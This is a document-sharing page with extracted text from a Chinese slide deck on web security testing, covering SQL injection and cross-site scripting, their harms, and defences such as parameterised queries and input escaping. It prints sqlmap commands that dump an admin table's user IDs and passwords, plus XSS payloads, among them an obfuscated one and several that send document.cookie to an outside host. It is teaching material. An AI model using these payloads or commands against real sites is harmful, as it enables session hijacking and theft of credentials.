XSS跨站攻擊及SQL注入課件_第1頁(yè)
XSS跨站攻擊及SQL注入課件_第2頁(yè)
XSS跨站攻擊及SQL注入課件_第3頁(yè)
XSS跨站攻擊及SQL注入課件_第4頁(yè)
XSS跨站攻擊及SQL注入課件_第5頁(yè)
已閱讀5頁(yè),還剩16頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶(hù)提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

Web安全性測(cè)試安全性測(cè)試手段SQL注入漏洞(工具:SqlMap)XSS跨站攻擊漏洞CSRF跨站請(qǐng)求偽造DDOS分布式拒絕服務(wù)釣魚(yú)點(diǎn)擊劫持跨站腳本漏洞,SQL注入原理跨站腳本漏洞分類(lèi)跨站腳本漏洞及案列漏洞解決方案漏洞的危害SQL注入漏洞

數(shù)據(jù)庫(kù)信息泄漏:數(shù)據(jù)庫(kù)中存儲(chǔ)的用戶(hù)隱私信息泄露。

網(wǎng)頁(yè)篡改:通過(guò)操作數(shù)據(jù)庫(kù)對(duì)特定網(wǎng)頁(yè)進(jìn)行篡改。網(wǎng)站被掛馬,傳播惡意軟件:修改數(shù)據(jù)庫(kù)一些字段的值,嵌入網(wǎng)馬鏈接,進(jìn)行掛馬攻擊。數(shù)據(jù)庫(kù)被惡意操作:數(shù)據(jù)庫(kù)服務(wù)器被攻擊,數(shù)據(jù)庫(kù)的系統(tǒng)管理員帳戶(hù)被竄改。服務(wù)器被遠(yuǎn)程控制,被安裝后門(mén):經(jīng)由數(shù)據(jù)庫(kù)服務(wù)器提供的操作系統(tǒng)支持,讓黑客得以修改或控制操作系統(tǒng)。

XSS跨站腳本漏洞

釣魚(yú)欺騙:最典型的就是利用目標(biāo)網(wǎng)站的反射型跨站腳本漏洞將目標(biāo)網(wǎng)站重定向到釣魚(yú)網(wǎng)站,或者注入釣魚(yú)JavaScript以監(jiān)控目標(biāo)網(wǎng)站的表單輸入,甚至發(fā)起基于DHTML更高級(jí)的釣魚(yú)攻擊方式。網(wǎng)站掛馬:跨站后利用IFrame嵌入隱藏的惡意網(wǎng)站或者將被攻擊者定向到惡意網(wǎng)站上,或者彈出惡意網(wǎng)站窗口等方式都可以進(jìn)行掛馬攻擊。身份盜用:Cookie是用戶(hù)對(duì)于特定網(wǎng)站的身份驗(yàn)證標(biāo)志,XSS可以盜取用戶(hù)的Cookie,從而利用該Cookie獲取用戶(hù)對(duì)該網(wǎng)站的操作權(quán)限。如果一個(gè)網(wǎng)站管理員用戶(hù)Cookie被竊取,將會(huì)對(duì)網(wǎng)站引發(fā)巨大的危害。盜取網(wǎng)站用戶(hù)信息:當(dāng)能夠竊取到用戶(hù)Cookie從而獲取到用戶(hù)身份時(shí),攻擊者可以獲取到用戶(hù)對(duì)網(wǎng)站的操作權(quán)限,從而查看用戶(hù)隱私信息。XSS蠕蟲(chóng):XSS

蠕蟲(chóng)可以用來(lái)打廣告、刷流量、掛馬、惡作劇、破壞網(wǎng)上數(shù)據(jù)、實(shí)施DDoS攻擊等。SqlMap實(shí)例Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”--tables–D“wepost”/*指定數(shù)據(jù)庫(kù)Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–current-user/*獲取當(dāng)前用戶(hù)名稱(chēng)Currentuser:‘root@localhost’Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–current-db/*獲取數(shù)據(jù)庫(kù)Currentdatabase:‘wepost’Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–columns–T“admin”–D“wepost”Sqlmap.py–.hk/article.php?id=276–dbms“Mysql”–dump–c“userid,password”–T“admin”–D“wepost”–v1SQL注入漏洞解決方案輸入驗(yàn)證錯(cuò)誤消息處理加密處理存儲(chǔ)過(guò)程來(lái)執(zhí)行所有的查詢(xún)使用專(zhuān)業(yè)的漏洞掃描工具禁止對(duì)重要表的Drop、Insert、Update、DeleteSQL注入漏洞解決方案對(duì)所有來(lái)自用戶(hù)輸入的數(shù)據(jù)進(jìn)行嚴(yán)格檢查、對(duì)數(shù)據(jù)庫(kù)配置實(shí)用最小權(quán)限原則所有查詢(xún)語(yǔ)句都實(shí)用庫(kù)提供的參數(shù)化查詢(xún)接口,參數(shù)化的語(yǔ)句實(shí)用參數(shù)而不是將用戶(hù)輸入變量嵌入到SQL語(yǔ)句中對(duì)進(jìn)入數(shù)據(jù)庫(kù)的特殊字符(“”<>&--;等)進(jìn)行轉(zhuǎn)義處理或編碼轉(zhuǎn)換數(shù)據(jù)長(zhǎng)度嚴(yán)格規(guī)定,能防止比較長(zhǎng)的SQL注入語(yǔ)句無(wú)法正確執(zhí)行數(shù)據(jù)層編碼統(tǒng)一避免顯示SQL錯(cuò)誤信息,如類(lèi)型、字段什么是XSSCrosssitescripting簡(jiǎn)稱(chēng)XSS原理:利用網(wǎng)站的漏洞向網(wǎng)站的頁(yè)面注入JAVASCRIPT等腳本內(nèi)容。根源:程序的輸入、輸出沒(méi)有考慮安全因素XSSCheatSheet/xss.html了解不痛瀏覽器和各種特殊的HTML標(biāo)簽如何執(zhí)行腳本XSS需要使用的關(guān)鍵字

“:!--<XSS>=&{()}各類(lèi)偽協(xié)議頭:

Javascript:vbscript:CSS樣式表腳本注入 Style=xss:expression(eval(String.fromCharCode(105,102,40,119,105,110,100,111,119,46,120,33,61,34,49,34,41,123,97,108,101,114,116,40,34,120,115,115,34,41,59,119,105,110,100,111,119,46,120,61,34,49,34,59,1235)))盜取用戶(hù)cookie信息嵌入惡意代碼<XMLID=I>

<X> <C><![CDATA[<imgsrc="javas]]><![CDATA[cript:xx=newImage();xx.src='39/pic/163.asp?url='+escape(document.URL)+'&cookie='+escape(document.cookie);"width=0height=0>]]>

</C>

</X></xml><SPANDATASRC=#IDATAFLD=CDATAFORMATAS=HTML></SPAN>掛馬

插入惡意的腳本內(nèi)容,運(yùn)行病毒、木馬。釣魚(yú)

篡改網(wǎng)頁(yè)內(nèi)容,騙取賬號(hào)、密碼等詐騙行為。劫持會(huì)話(huà)

讀取會(huì)話(huà)Cookie,傳送給第三方劫持身份。XSSWorm

使用AJAX技術(shù),做幾何趨勢(shì)的增長(zhǎng)傳播。非持久型XSS

需要從URL傳參,點(diǎn)擊鏈接觸發(fā)持久型XSS XSS內(nèi)容已存儲(chǔ)到數(shù)據(jù)庫(kù),寫(xiě)到固定頁(yè)面。DOMXSS JAVASCRIPT處理數(shù)據(jù)輸出出現(xiàn)漏洞

瀏覽器的漏洞造成的XSS

表單值容易出現(xiàn)XSS

搜索框、信息提示、個(gè)人資料、友情鏈接、北京圖片等。

各類(lèi)表單值、隱藏的表單值都很危險(xiǎn)在搜索框中輸入“><bodyonload=alert(document.cookie)><“點(diǎn)擊搜索課程上圖可看到已過(guò)濾反斜杠非持久XSS持久XSS分享網(wǎng)站地址”/a.jsp?name=<script>alert(document.cookie)</script>”攻擊代碼

varimg=newImage();img.src=http://www.XXX.cn/log.jsp?c=“”+document.cookie”””看似前段驗(yàn)證了非法字符,就已經(jīng)安全了嗎?錯(cuò)仍然可以通過(guò)GET方法跳過(guò)前段/groups/search?keyword=%22%3E3Cbody%20onload=alert(1)%3E%3C%22記錄會(huì)話(huà)模擬登陸劫持會(huì)話(huà)發(fā)送XSS給好友

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶(hù)所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶(hù)上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶(hù)因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論